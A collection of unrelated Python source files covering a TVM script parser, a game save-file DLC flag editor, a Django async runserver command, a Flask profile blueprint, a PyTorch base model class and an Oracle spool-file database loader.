return [self.transform(element) for element in node.values]
def transform_Var(self, node):
"""Variable visitor
Handles variables like `x` in `x = 2`.
"""
name = node.id.name
if name == "meta":
return self.meta
symbol = Registry.lookup(name)
if symbol is not None:
return symbol
symbol = self.context.lookup_symbol(name)
if symbol is not None:
return symbol
self.report_error(f"Unknown identifier {name}.", node.span)
def transform_TypeVar(self, node):
"""Type variable visitor.
Equivalent to `transform_Var` but for types.
"""
name = node.id.name
symbol = Registry.lookup(name) or self.context.lookup_symbol(name)
if symbol is not None:
return symbol
self.report_error(f"Unknown identifier {name}.", node.span)
def transform_Constant(self, node):
"""Constant value visitor.
Constant values include `None`, `"strings"`, `2` (integers), `4.2`
(floats), and `true` (booleans).
"""
return tvm.runtime.convert(node.value, span=tvm_span_from_synr(node.span))
def transform_TypeConstant(self, node):
"""Constant value visitor for types.
See `transform_Constant`.
"""
return node.value
def transform_TypeTuple(self, node):
"""Tuple value visitor for types.
Mostly used in `transform_TypeCall` and `transform_TypeApply`.
"""
return [self.transform(value) for value in node.values]
def transform_TypeApply(self, node):
"""Visitor for Type[Type] expressions.
Mostly used for ``T.Ptr`` expressions.
"""
func = self.transform(node.func_name)
if not isinstance(func, ty.TypeGeneric) or not hasattr(func, "__getitem__"):
self.report_error(
f"Use of type arguments requires a type that accepts type arguments (e.g. T.Ptr), "
f"but found {type(func).__name__} instead.",
node.span,
)
param_types = []
for param in node.params:
param_type = self.transform(param)
if not isinstance(param_type, ty.TypeGeneric):
self.report_error(f"Expected a type but found {type(param).__name__}", param.span)
param_types.append(param_type)
if len(param_types) == 1:
return func[param_types[0]]
else:
return func[param_types]
def handle_match_buffer_type(self, node, buffer_name):
"""special function to handle syntax sugar for match buffer.
This method is for buffer declarations in the function parameters.
"""
func = self.transform(node.func_name)
assert isinstance(func, SpecialStmt)
# parse args and kwargs for TypeCall and TypeApply
arg_list = self.parse_arg_list(func, node)
# Note that the third element in arg_list would always be the 'name'
# TODO: This index is hardcoded as a workaround. Better to make it programmatic
if arg_list[2] is None:
arg_list[2] = buffer_name
buf = func.handle(node, self.context, arg_list, node.func_name.span)
return buf
def transform_Return(self, node):
self.report_error(
"TVM script does not support return statements. Instead the last statement in any "
"block is implicitly returned.",
node.span,
)
def get_tir_namespace(script: Union[Callable, type]) -> List[str]:
assert inspect.isfunction(script) or inspect.isclass(script)
env: Dict[str, Any] = script.__globals__
return [key for key in env.keys() if env[key] == tir]
def from_source(
input_func: Union[str, Callable], tir_prefix: Optional[List[str]] = None
) -> Union[PrimFunc, IRModule]:
"""Parse function or string into PrimFunc or IRModule.
If possible, pass the TVM script in as a function so that line numbers and
filename will be accurate.
Parameters
----------
    input_func : Union[str, Callable]
The python function to be parsed.
tir_prefix : Optional[List[str]]
The tir prefix list. Only works for str input, default by "tir" and "T".
Returns
-------
output : Union[Function, Module]
The Function or Module in IR.
"""
if isinstance(input_func, str):
tir_prefix = ["T", "tir"] if tir_prefix is None else tir_prefix
return to_ast(input_func, TVMDiagnosticCtx(), TVMScriptParser(0, tir_prefix))
elif inspect.isfunction(input_func):
_, start_line = inspect.getsourcelines(input_func)
env: Dict[str, Any] = input_func.__globals__
namespace = [key for key in env.keys() if env[key] is tir]
parser = TVMScriptParser(start_line, namespace)
result = to_ast(input_func, TVMDiagnosticCtx(), parser)
return result
else:
raise TypeError("Only function definitions are supported.")
def ir_module(input_module: type) -> IRModule:
"""Decorate a python class as tvm IRModule.
Parameters
----------
input_module : type
The python class to be parsed.
Returns
-------
output : IRModule
The result IRModule.
"""
if inspect.isclass(input_module):
func_dict = {
name: f for name, f in input_module.__dict__.items() if isinstance(f, BaseFunc)
}
mod = IRModule(func_dict)
mod = relax.transform.ResolveGlobals()(mod)
# FIXME(@altanh): where is the source map?
return mod
raise TypeError("Only class definitions are supported.")
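# Illustrative usage sketch (not part of the original module), assuming a working TVM
# build: parse a small TVM script function from a source string with `from_source`
# defined above. The script below is a plausible example, not taken from the TVM test
# suite, and the exact syntax accepted depends on the TVM version.
if __name__ == "__main__":
    _example_src = """
@T.prim_func
def vector_add_one(a: T.handle, b: T.handle) -> None:
    A = T.match_buffer(a, (16,), "float32")
    B = T.match_buffer(b, (16,), "float32")
    for i in T.serial(0, 16):
        B[i] = A[i] + 1.0
"""
    parsed = from_source(_example_src)
    print(type(parsed))  # expected: tvm.tir.PrimFunc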
|
the-stack_106_16958
|
import dq11s.save
import sys
import struct
DRACONIAN_FLAG_IDENTIFIER = "DLC_00".encode()
DRACONIAN_FLAG_OFFSET_FROM_IDENTIFIER = -0x30
DRACONIAN_FLAG_STRUCT = struct.Struct('<IIIIIIII')
DRACONIAN_FLAGS_TO_ADD = [
1, # flag 0
1, # flag 1
1, # flag 2
1, # flag 3
1, # flag 4
1, # flag 5
1, # flag 6
1, # flag 7
]
if __name__ == "__main__":
save_path = sys.argv[1]
with open(save_path, 'rb') as save_file:
save_buffer = save_file.read()
save_is_encrypted, save_version = dq11s.save.get_save_is_encrypted_and_version(save_buffer)
if save_is_encrypted is None:
print("file not recognized")
exit(-1)
if save_is_encrypted:
save_buffer, is_verified = dq11s.save.get_save_decrypt(save_buffer, save_version)
if not is_verified:
print("failed to verify save decryption")
exit(-2)
draconian_identifier_offset = save_buffer.find(DRACONIAN_FLAG_IDENTIFIER)
if draconian_identifier_offset == -1:
print("failed to find flag location")
exit(-3)
draconian_offset = draconian_identifier_offset + DRACONIAN_FLAG_OFFSET_FROM_IDENTIFIER
save_buffer = save_buffer[:draconian_offset] + DRACONIAN_FLAG_STRUCT.pack(*DRACONIAN_FLAGS_TO_ADD) \
+ save_buffer[draconian_offset + DRACONIAN_FLAG_STRUCT.size:]
with open(save_path, 'wb') as out_file:
out_file.write(dq11s.save.get_save_encrypt(save_buffer, save_version))
print("pray to sothis that this has worked wait wrong franchise")
|
the-stack_106_16960
|
from Instrucciones.TablaSimbolos.Instruccion import Instruccion
from Instrucciones.TablaSimbolos.Simbolo import Simbolo
class Declare(Instruccion):
def __init__(self, id, operacion, id2, linea, columna):
Instruccion.__init__(self,None,linea,columna)
self.identificador = id
self.valor = id2
self.operacion = operacion
def ejecutar(self, ts, arbol):
super().ejecutar(ts,arbol)
#el id es para guardarlo en la tabla
exp = Simbolo(self.identificador,self.operacion,self.valor,self.linea,self.columna)
ts.setVariable(exp)
print("imprimir_declaracion")
'''
instruccion = Declare("hola mundo",None, 1,2)
instruccion.ejecutar(None,None)
'''
|
the-stack_106_16961
|
import asyncio
import errno
import datetime
import logging
import os
import socket
import sys
from django.conf import settings
from django.contrib.staticfiles.management.commands.runserver import Command as BaseCommand
from django.utils import autoreload
from django.utils.encoding import force_text
from aiodjango import get_aio_application
class Command(BaseCommand):
def get_handler(self, *args, **options):
wsgi = super().get_handler(*args, **options)
return get_aio_application(wsgi=wsgi)
def inner_run(self, *args, **options):
# If an exception was silenced in ManagementUtility.execute in order
# to be raised in the child process, raise it now.
autoreload.raise_last_exception()
shutdown_message = options.get('shutdown_message', '')
quit_command = 'CTRL-BREAK' if sys.platform == 'win32' else 'CONTROL-C'
self.stdout.write("Performing system checks...\n\n")
self.check(display_num_errors=True)
self.check_migrations()
now = datetime.datetime.now().strftime('%B %d, %Y - %X')
self.stdout.write(now)
        self.stdout.write((
            "Django version %(version)s, using settings %(settings)r\n"
            "Starting aiodjango server at http://%(addr)s:%(port)s/\n"
"Quit the server with %(quit_command)s.\n"
) % {
"version": self.get_version(),
"settings": settings.SETTINGS_MODULE,
"addr": '[%s]' % self.addr if self._raw_ipv6 else self.addr,
"port": self.port,
"quit_command": quit_command,
})
if options.get('use_reloader'):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
else:
loop = asyncio.get_event_loop()
app = self.get_handler(*args, **options)
log = logging.getLogger('aiodjango.runserver')
log.propagate = False
log.setLevel(logging.INFO)
stdout = logging.StreamHandler(stream=self.stdout)
log.addHandler(stdout)
handler = app.make_handler(access_log=log, access_log_format='%t "%r" %s %b %D')
server = None
try:
server = loop.run_until_complete(
loop.create_server(handler, self.addr, int(self.port)))
loop.run_forever()
except socket.error as e:
# Use helpful error messages instead of ugly tracebacks.
ERRORS = {
errno.EACCES: "You don't have permission to access that port.",
errno.EADDRINUSE: "That port is already in use.",
errno.EADDRNOTAVAIL: "That IP address can't be assigned to.",
}
try:
error_text = ERRORS[e.errno]
except KeyError:
error_text = force_text(e)
self.stderr.write("Error: %s" % error_text)
# Need to use an OS exit because sys.exit doesn't work in a thread
os._exit(1)
except KeyboardInterrupt:
if shutdown_message:
self.stdout.write(shutdown_message)
sys.exit(0)
finally:
loop.run_until_complete(handler.finish_connections(1.0))
if server is not None:
server.close()
loop.run_until_complete(server.wait_closed())
loop.run_until_complete(app.finish())
loop.close()
|
the-stack_106_16964
|
from app import db
from app.models.user import User
from app.forms.auth import EditProfileForm
from flask import current_app, Blueprint, render_template, request, redirect, url_for, flash
from flask_login import current_user, login_required
user = Blueprint('user', __name__, url_prefix='/user')
@user.route('/<username>')
@login_required
def view(username):
the_user = User.query.filter_by(username=username).first_or_404()
return render_template('user.html', user=the_user)
@user.route('/edit', methods=['GET', 'POST'])
@login_required
def edit():
form = EditProfileForm(current_user.username)
if form.validate_on_submit():
current_user.username = form.username.data
current_user.about_me = form.about_me.data
db.session.commit()
flash('Your changes have been saved.')
return redirect(url_for('user.edit'))
elif request.method == 'GET':
form.username.data = current_user.username
form.about_me.data = current_user.about_me
return render_template('edit_profile.html', title='Edit Profile',
form=form)
#@user.before_request
#def before_request():
# if current_user.is_authenticated:
# current_user.last_seen = datetime.utcnow()
# db.session.commit()
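# Illustrative sketch (not part of the original module): a hypothetical helper showing how
# the blueprint defined above would be attached to a Flask app, e.g. from an application
# factory in app/__init__.py.
def register_user_blueprint(app):
    """Attach the user blueprint to the given Flask application instance."""
    app.register_blueprint(user)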
|
the-stack_106_16965
|
__author__ = 'patras'
from domain_springDoor import *
from timer import DURATION
from state import state, rv
DURATION.TIME = {
'unlatch1': 5,
'unlatch2': 5,
'holdDoor': 2,
'passDoor': 3,
'releaseDoor': 2,
'closeDoors': 3,
'move': 7,
'take': 2,
'put': 2,
}
DURATION.COUNTER = {
'unlatch1': 5,
'unlatch2': 5,
'holdDoor': 2,
'passDoor': 3,
'releaseDoor': 2,
'closeDoors': 3,
'move': 7,
'take': 2,
'put': 2,
}
rv.LOCATIONS = [1, 2, 3, 4]
rv.EDGES = {1: [2], 2: [1, 3], 3: [2, 4], 4: [3]}
rv.DOORS = ['d1', 'd2']
rv.DOORLOCATIONS = {(3, 4): 'd1', (1, 2): 'd2'}
rv.DOORTYPES = {'d1': 'ordinary', 'd2': 'spring'}
rv.ROBOTS = ['r1', 'r2', 'r3']
def ResetState():
state.load = {'r1': NIL, 'r2': NIL, 'r3': NIL}
state.status = {'r1': 'free', 'r2': 'free', 'r3': 'free'}
state.loc = {'r1': 4, 'r2': 4, 'r3': 4}
state.pos = {'o1': 1}
state.doorStatus = {'d1': 'closed', 'd2': 'closed', }
state.doorType = {'d1': UNK, 'd2': UNK, }
tasks = {
8: [['fetch', 'r1', 'o1', 1]],
}
eventsEnv = {
}
|
the-stack_106_16968
|
import os
import torch
from collections import OrderedDict
from abc import ABC, abstractmethod
from . import networks
from tqdm import tqdm
class BaseModel(ABC):
"""This class is an abstract base class (ABC) for models.
To create a subclass, you need to implement the following five functions:
-- <__init__>: initialize the class; first call BaseModel.__init__(self, opt).
-- <set_input>: unpack data from dataset and apply preprocessing.
-- <forward>: produce intermediate results.
-- <optimize_parameters>: calculate losses, gradients, and update network weights.
-- <modify_commandline_options>: (optionally) add model-specific options and set default options.
"""
def __init__(self, opt):
"""Initialize the BaseModel class.
Parameters:
opt (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions
When creating your custom class, you need to implement your own initialization.
        In this function, you should first call <BaseModel.__init__(self, opt)>
Then, you need to define four lists:
-- self.loss_names (str list): specify the training losses that you want to plot and save.
            -- self.model_names (str list): define networks used in our training.
            -- self.visual_names (str list): specify the images that you want to display and save.
-- self.optimizers (optimizer list): define and initialize optimizers. You can define one optimizer for each network. If two networks are updated at the same time, you can use itertools.chain to group them. See cycle_gan_model.py for an example.
"""
self.opt = opt
self.gpu_ids = opt.gpu_ids
self.isTrain = opt.isTrain
self.device = torch.device('cuda:{}'.format(self.gpu_ids[0])) if self.gpu_ids else torch.device('cpu') # get device name: CPU or GPU
self.save_dir = os.path.join(opt.checkpoints_dir, opt.name) # save all the checkpoints to save_dir
if opt.preprocess != 'scale_width': # with [scale_width], input images might have different sizes, which hurts the performance of cudnn.benchmark.
torch.backends.cudnn.benchmark = True
self.loss_names = []
self.model_names = []
self.visual_names = []
self.optimizers = []
self.image_paths = []
self.metric = 0 # used for learning rate policy 'plateau'
@staticmethod
def dict_grad_hook_factory(add_func=lambda x: x):
saved_dict = dict()
def hook_gen(name):
def grad_hook(grad):
saved_vals = add_func(grad)
saved_dict[name] = saved_vals
return grad_hook
return hook_gen, saved_dict
@staticmethod
def modify_commandline_options(parser, is_train):
"""Add new model-specific options, and rewrite default values for existing options.
Parameters:
parser -- original option parser
is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options.
Returns:
the modified parser.
"""
return parser
@abstractmethod
def set_input(self, input):
"""Unpack input data from the dataloader and perform necessary pre-processing steps.
Parameters:
input (dict): includes the data itself and its metadata information.
"""
pass
@abstractmethod
def forward(self):
"""Run forward pass; called by both functions <optimize_parameters> and <test>."""
pass
@abstractmethod
def optimize_parameters(self):
"""Calculate losses, gradients, and update network weights; called in every training iteration"""
pass
def setup(self, opt):
"""Load and print networks; create schedulers
Parameters:
opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions
"""
if self.isTrain:
self.schedulers = [networks.get_scheduler(optimizer, opt) for optimizer in self.optimizers]
if not self.isTrain or opt.continue_train:
load_suffix = opt.epoch
self.load_networks(load_suffix)
self.print_networks(opt.verbose)
def parallelize(self):
for name in self.model_names:
if isinstance(name, str):
net = getattr(self, 'net' + name)
setattr(self, 'net' + name, torch.nn.DataParallel(net, self.opt.gpu_ids))
def data_dependent_initialize(self, data):
pass
def eval(self):
"""Make models eval mode during test time"""
for name in self.model_names:
if isinstance(name, str):
net = getattr(self, 'net' + name)
net.eval()
def test(self):
"""Forward function used in test time.
This function wraps <forward> function in no_grad() so we don't save intermediate steps for backprop
It also calls <compute_visuals> to produce additional visualization results
"""
with torch.no_grad():
self.forward()
self.compute_visuals()
def compute_visuals(self):
"""Calculate additional output images for visdom and HTML visualization"""
pass
def get_image_paths(self):
""" Return image paths that are used to load current data"""
return self.image_paths
def update_learning_rate(self):
"""Update learning rates for all the networks; called at the end of every epoch"""
for scheduler in self.schedulers:
if self.opt.lr_policy == 'plateau':
scheduler.step(self.metric)
else:
scheduler.step()
lr = self.optimizers[0].param_groups[0]['lr']
print('learning rate = %.7f' % lr)
def get_current_visuals(self):
"""Return visualization images. train.py will display these images with visdom, and save the images to a HTML"""
visual_ret = OrderedDict()
for name in self.visual_names:
if isinstance(name, str):
visual_ret[name] = getattr(self, name)
return visual_ret
def get_current_losses(self):
"""Return traning losses / errors. train.py will print out these errors on console, and save them to a file"""
errors_ret = OrderedDict()
for name in self.loss_names:
if isinstance(name, str):
errors_ret[name] = float(getattr(self, 'loss_' + name)) # float(...) works for both scalar tensor and float number
return errors_ret
def save_networks(self, epoch):
"""Save all the networks to the disk.
Parameters:
epoch (int) -- current epoch; used in the file name '%s_net_%s.pth' % (epoch, name)
"""
for name in self.model_names:
if isinstance(name, str):
save_filename = '%s_net_%s.pth' % (epoch, name)
save_path = os.path.join(self.save_dir, save_filename)
net = getattr(self, 'net' + name)
if len(self.gpu_ids) > 0 and torch.cuda.is_available():
torch.save(net.module.cpu().state_dict(), save_path)
net.cuda(self.gpu_ids[0])
else:
torch.save(net.cpu().state_dict(), save_path)
def __patch_instance_norm_state_dict(self, state_dict, module, keys, i=0):
"""Fix InstanceNorm checkpoints incompatibility (prior to 0.4)"""
key = keys[i]
if i + 1 == len(keys): # at the end, pointing to a parameter/buffer
if module.__class__.__name__.startswith('InstanceNorm') and \
(key == 'running_mean' or key == 'running_var'):
if getattr(module, key) is None:
state_dict.pop('.'.join(keys))
if module.__class__.__name__.startswith('InstanceNorm') and \
(key == 'num_batches_tracked'):
state_dict.pop('.'.join(keys))
else:
self.__patch_instance_norm_state_dict(state_dict, getattr(module, key), keys, i + 1)
def load_networks(self, epoch):
"""Load all the networks from the disk.
Parameters:
epoch (int) -- current epoch; used in the file name '%s_net_%s.pth' % (epoch, name)
"""
for name in self.model_names:
if isinstance(name, str):
load_filename = '%s_net_%s.pth' % (epoch, name)
if self.opt.isTrain and self.opt.pretrained_name is not None:
load_dir = os.path.join(self.opt.checkpoints_dir, self.opt.pretrained_name)
else:
load_dir = self.save_dir
load_path = os.path.join(load_dir, load_filename)
net = getattr(self, 'net' + name)
if isinstance(net, torch.nn.DataParallel):
net = net.module
tqdm.write('loading the model from %s' % load_path)
# if you are using PyTorch newer than 0.4 (e.g., built from
# GitHub source), you can remove str() on self.device
state_dict = torch.load(load_path, map_location=str(self.device))
if hasattr(state_dict, '_metadata'):
del state_dict._metadata
# patch InstanceNorm checkpoints prior to 0.4
# for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop
# self.__patch_instance_norm_state_dict(state_dict, net, key.split('.'))
net.load_state_dict(state_dict)
def print_networks(self, verbose):
"""Print the total number of parameters in the network and (if verbose) network architecture
Parameters:
verbose (bool) -- if verbose: print the network architecture
"""
tqdm.write('---------- Networks initialized -------------')
for name in self.model_names:
if isinstance(name, str):
net = getattr(self, 'net' + name)
num_params = 0
for param in net.parameters():
num_params += param.numel()
if verbose:
print(net)
tqdm.write('[Network %s] Total number of parameters : %.3f M' % (name, num_params / 1e6))
tqdm.write('-----------------------------------------------')
def set_requires_grad(self, nets, requires_grad=False):
"""Set requies_grad=Fasle for all the networks to avoid unnecessary computations
Parameters:
nets (network list) -- a list of networks
requires_grad (bool) -- whether the networks require gradients or not
"""
if not isinstance(nets, list):
nets = [nets]
for net in nets:
if net is not None:
for param in net.parameters():
param.requires_grad = requires_grad
def generate_visuals_for_evaluation(self, data, mode):
return {}
|
the-stack_106_16969
|
import csv
import datetime
import re
import os
import logging
import glob
#import app.models
import app.database
import sqlalchemy
import sqlalchemy.orm  # needed for sessionmaker in CreateDBTable.getRowCount
DB_ENGINE = app.database.engine
DB_METADATA = sqlalchemy.MetaData()
#1998-02-09
DATEFORMAT = '%Y-%m-%d'
LOGGER = logging.getLogger()
class TypeMap:
"""used to map specific types defined by site data.
"""
def __init__(self):
self.defaultType = sqlalchemy.types.String
self.typeMap = {
"docid": sqlalchemy.types.Integer,
"site_id": sqlalchemy.types.Integer,
"siteid": sqlalchemy.types.Integer,
"catid": sqlalchemy.types.Integer,
"sequenceno": sqlalchemy.types.Integer,
"pin": sqlalchemy.types.Integer,
"pidno": sqlalchemy.types.Integer,
"eventid": sqlalchemy.types.Integer,
"associatedsiteid": sqlalchemy.types.Integer,
"participant_id": sqlalchemy.types.Integer,
"participantid": sqlalchemy.types.Integer,
"questionid": sqlalchemy.types.Integer,
"parentid": sqlalchemy.types.Integer,
"ownerid": sqlalchemy.types.Integer,
"contactid": sqlalchemy.types.Integer,
"completorid": sqlalchemy.types.Integer,
"aec_id": sqlalchemy.types.Integer,
"lat": sqlalchemy.types.Integer,
"latdeg": sqlalchemy.types.Integer,
"latmin": sqlalchemy.types.Integer,
"latsec": sqlalchemy.types.Integer,
"lon": sqlalchemy.types.Integer,
"londeg": sqlalchemy.types.Integer,
"lonmin": sqlalchemy.types.Integer,
"lonsec": sqlalchemy.types.Integer,
"regdate": sqlalchemy.types.Date,
"eventdate": sqlalchemy.types.Date,
"approval_date": sqlalchemy.types.Date,
"moddate": sqlalchemy.types.Date,
"tombdate": sqlalchemy.types.Date,
"effectivedate": sqlalchemy.types.Date,
"enddate": sqlalchemy.types.Date,
"datenoted": sqlalchemy.types.Date,
"date_completed": sqlalchemy.types.Date,
"expirydate": sqlalchemy.types.Date,
"datecompleted": sqlalchemy.types.Date,
"datereceived": sqlalchemy.types.Date,
"datelocalauthority": sqlalchemy.types.Date,
"dateregistrar": sqlalchemy.types.Date,
"datedecision": sqlalchemy.types.Date,
"dateentered": sqlalchemy.types.Date,
"submissiondate": sqlalchemy.types.Date,
"documentdate": sqlalchemy.types.Date
}
def getType(self, columnName):
retType = self.defaultType
if columnName.lower() in self.typeMap:
retType = self.typeMap[columnName.lower()]
return retType
class ColumnDef:
def __init__(self, columnName, columnLength=None, columnPosition=None, columnType=None):
self.columnName = columnName
self._columnLength = columnLength
self.columnType = columnType
self._columnPosition = columnPosition
@property
def columnLength(self):
return self._columnLength
@columnLength.setter
def columnLength(self, columnLength):
self._columnLength = int(columnLength)
@property
def columnPosition(self):
return self._columnPosition
@columnPosition.setter
def columnPosition(self, columnPosition):
self._columnPosition = int(columnPosition)
def __str__(self):
outStr = f'{self.columnName} {self._columnLength} {self._columnPosition}'
return outStr
class ColumnDefs:
def __init__(self):
self.columnDefs = []
self.curPos = 0
self.typeMap = TypeMap()
def addColumnDef(self, columnDef):
# update the type with the type map
columnDef.columnType = self.typeMap.getType(columnDef.columnName)
self.columnDefs.append(columnDef)
def __iter__(self):
return self
def __next__(self):
if self.curPos >= len(self.columnDefs):
self.curPos = 0  # reset so the column defs can be iterated again (once per data line)
raise StopIteration
retVal = self.columnDefs[self.curPos]
self.curPos += 1
return retVal
def __len__(self):
return len(self.columnDefs)
def __str__(self):
outStr = []
for columnDef in self.columnDefs:
outStr.append(str(columnDef))
return str(outStr)
def getDataDict(self, line):
"""Gets an input data line, uses the parameters in the column definition to
restructure the line into a data dict that can be used to insert the data into
the database.
:param line: input data line that was generated using the spool file
defs that will be dumped into the database
:type line: str
"""
outDict = {}
colCnt = 0
LOGGER.debug(f'columnDefs: {len(self)}')
for columnDef in self:
startPosition = columnDef.columnPosition
columnLength = columnDef.columnLength
endPosition = startPosition + columnLength
dataValue = line[startPosition:endPosition].strip()
if columnDef.columnType == sqlalchemy.types.Integer:
if dataValue == '0':
dataValue = 0
elif not dataValue:
dataValue = None
else:
dataValue = int(dataValue)
if columnDef.columnType == sqlalchemy.types.Date:
if not dataValue:
dataValue = None
else:
try:
dataValue = datetime.datetime.strptime(dataValue, DATEFORMAT)
except ValueError:
LOGGER.warning(f'invalid date value: {dataValue}')
raise
outDict[columnDef.columnName] = dataValue
LOGGER.debug(f'{colCnt} : {columnDef.columnName} : -{dataValue}-')
colCnt += 1
return outDict
class ReadSqlSpoolFiles:
"""used to read the .lis files and extract:
* column names
* column lengths
* column types
It gets this information by parsing the column definitions out of the SQL
file. SQL*Plus column formatting reference:
https://docs.oracle.com/cd/B19306_01/server.102/b14357/ch12013.htm#BACHCABF
"""
def __init__(self, inputSpoolFile):
self.inputSpoolFile = inputSpoolFile
# used to identify a line that includes a column def
columnDefRegexString = '^\s*column\s+\w+\s+format\s+\w+.*;$'
self.coldefRegex = re.compile(columnDefRegexString)
# used to extract the length from the column def
replaceRegextString = '^\s*column\s+\w+\s+format\s+\w{1}'
self.replaceRegex = re.compile(replaceRegextString)
# stores the linesize defined in the spoolfile
self.linesize = None
# def getDataTableName(self):
# baseName = os.path.splitext(os.path.basename(self.inputSpoolFile))[0] + '.lis'
# dirName = os.path.dirname(self.inputSpoolFile)
# dataTable = os.path.join(dirName, baseName)
def getColumnName(self, line):
# re.split(pattern, string, maxsplit=0, flags=0)
lineSplit = re.split('\s+', line)
LOGGER.debug(f"split line: {lineSplit}")
return lineSplit[1]
def isSetDef(self, line, paramName=None):
"""parses the input line looking for a pattern starts with a
'set' parameter
if the added paramName is provided then looks for a set statement
where the parameter that is being set, and returns true if the
line is a 'set' line for that 'paramName'
:param line: input line to be evaluated
:type line: str
:param paramName: [name of the input parameter], defaults to None
:type paramName: [str], optional
:return: [a boolean indicating if the line is a 'set' line and if a parameter
is provided whether its a set for that parameter]
:rtype: [bool]
"""
retVal = False
line = line.replace(';', '')
lineList = re.split("\s+", line)
#LOGGER.debug(f'LineList: {lineList}, {paramName}')
if lineList[0].lower() == 'set':
if paramName is not None:
if paramName.lower() == lineList[1].lower():
retVal = True
else:
retVal = True
#LOGGER.debug(f'retVal: {retVal}')
return retVal
def getSetValue(self, line):
"""assumes that the input line is a 'set' line and if so will
return the value that corresponds with the set
:param line: [input line]
:type line: [type]
:return:
"""
retVal = None
if self.isSetDef(line):
line = line.replace(';', '')
lineList = re.split("\s+", line)
retVal = lineList[-1]
return retVal
def getDefs(self):
"""reads the input sql file used to generate the dump file
and extracts the column name definitions.
:return: a ColumnDefs collection describing each column's name, length and
start position in the fixed-width data file
:rtype: ColumnDefs
"""
# columnLengths will be a list defining the locations in list of characters
# where one column starts and another ends
columnLengths = ColumnDefs()
prevValue = 0
with open(self.inputSpoolFile) as fh:
for line in fh:
line = line.strip()
if self.isSetDef(line, "linesize"):
self.linesize = self.getSetValue(line)
LOGGER.debug(f"linesize: {self.linesize}")
if self.isColumnDef(line):
LOGGER.debug(f'input line: {line}')
colName = self.getColumnName(line)
colLength = self.getColumnLength(line)
columnPosition = prevValue
colDef = ColumnDef(colName, colLength, columnPosition)
columnLengths.addColumnDef(colDef)
prevValue = prevValue + 1 + colLength
return columnLengths
def getColumnLength(self, line):
strippedString = self.replaceRegex.sub('', line).replace(';', '').strip()
LOGGER.debug(strippedString)
return int(strippedString)
def isColumnDef(self, line):
match = False
if self.coldefRegex.match(line):
match = True
LOGGER.debug(f'line: {line}')
return match
class CreateDBTable:
"""using the sql spool file that was used to create the dump files will
create a database table with the same prefix as the name of the spool
file.
Name of the table can be overriden by providing that arg
"""
def __init__(self, sqlSpoolFile, tableName=None):
if tableName is None:
tableName = os.path.splitext(os.path.basename(sqlSpoolFile))[0]
self.tableName = tableName
self.sqlSpoolFile = sqlSpoolFile
self.readSpool = ReadSqlSpoolFiles(self.sqlSpoolFile)
self.columnDefs = self.readSpool.getDefs()
def listTables(self):
inspector = sqlalchemy.inspect(DB_ENGINE)
for table_name in inspector.get_table_names():
for column in inspector.get_columns(table_name):
LOGGER.debug("Column: %s" % column['name'])
def createTable(self):
saTable = sqlalchemy.Table(self.tableName, DB_METADATA)
for coldef in self.columnDefs:
column = sqlalchemy.Column(coldef.columnName, coldef.columnType)
saTable.append_column(column, replace_existing=True)
LOGGER.info(f"creating the table: {self.tableName}")
DB_METADATA.create_all(DB_ENGINE)
def dropTable(self):
table = DB_METADATA.tables[self.tableName]
LOGGER.info(f"dropping the table: {self.tableName}")
table.drop(DB_ENGINE)
#DB_METADATA.drop_all(bind=DB_ENGINE, tables=[table])
def tableExists(self, tableName, connection):
tableExist = True
if not DB_ENGINE.dialect.has_table(connection, tableName):
tableExist = False
return tableExist
#def getSourceDataRowCount(self):
def getRowCount(self, tableName):
Session = sqlalchemy.orm.sessionmaker(bind=DB_ENGINE)
session = Session()
rows = session.query(DB_METADATA.tables[tableName]).count()
session.close()
rows = int(rows)
LOGGER.info(f"table {tableName} row count: {rows}")
return rows
def loadData(self, dataFile, dumpReplace=True):
"""[summary]
:param dataFile: [description]
:type dataFile: [type]
:param dumpReplace: [description], defaults to True
:type dumpReplace: bool, optional
"""
# TODO: the sql def file has a parameter called linesize. Need to ignore the carriage returns and treat input data as a stream.
bufferSize = 1000
bufferCnt = 0
buffer = []
if dumpReplace:
self.dropTable()
LOGGER.debug(f"column defs: {self.columnDefs}")
with DB_ENGINE.connect() as conn:
# get rows in datafile
LOGGER.info(f"datafile to load: {dataFile}")
rowsInDataFile = sum(1 for line in open(dataFile, "r", encoding='cp1252'))
LOGGER.info(f"rows in data file {os.path.basename(dataFile)} : {rowsInDataFile}")
with open(dataFile, "r", encoding='cp1252') as f:
table = DB_METADATA.tables[self.tableName]
if not self.tableExists(self.tableName, conn):
self.createTable()
# get rows in table
dbTableRowCount = self.getRowCount(self.tableName)
LOGGER.info(f"src row count: {rowsInDataFile} dest row count: {dbTableRowCount}")
if dbTableRowCount != rowsInDataFile and dbTableRowCount != 0:
# rows in source and destination do not align, so recreate
self.dropTable()
self.createTable()
dbTableRowCount = 0
if not dbTableRowCount and rowsInDataFile:
rowsInserted = 0
for line in f:
dataDict = self.columnDefs.getDataDict(line)
buffer.append(dataDict)
if bufferCnt >= bufferSize:
conn.execute(table.insert(), buffer)
bufferCnt = -1
buffer = []
LOGGER.info(f"rows inserted: {rowsInserted}")
#insStatement = sqlalchemy.insert(table).values(**dataDict)
#result = conn.execute(insStatement)
#if not rowsInserted % 200:
# LOGGER.debug(f"inserted {rowsInserted}")
rowsInserted += 1
bufferCnt += 1
if buffer:
conn.execute(table.insert(), buffer)
bufferCnt = -1
buffer = []
LOGGER.info(f"rows {bufferCnt} inserted: {rowsInserted}")
if __name__ == '__main__':
# logging setup
LOGGER.setLevel(logging.INFO)
hndlr = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(lineno)d - %(message)s')
hndlr.setFormatter(formatter)
LOGGER.addHandler(hndlr)
LOGGER.debug("first test message")
# load a single table
# ----------------------------------
# inputDataFile = '/home/kjnether/proj/site/sampledata/srprfuse.lis'
# sqlDefFile = '/home/kjnether/proj/site/runscript_local/bconline/srprfuse.sql'
# createDb = CreateDBTable(sqlDefFile)
# createDb.createTable()
# createDb.listTables()
# createDb.loadData(inputDataFile)
# loading all tables
tableDir = r'/home/kjnether/proj/site/sampledata/*.lis'
sqlDir = r'/home/kjnether/proj/site/runscript_local/bconline'
#files = os.listdir(tableDir)
datafiles = glob.glob(tableDir)
LOGGER.debug(f"datafiles: {datafiles}")
exceptionList = []
for curFile in datafiles:
if os.path.basename(curFile) == 'srprofil.lis':
exceptionList.append(curFile)
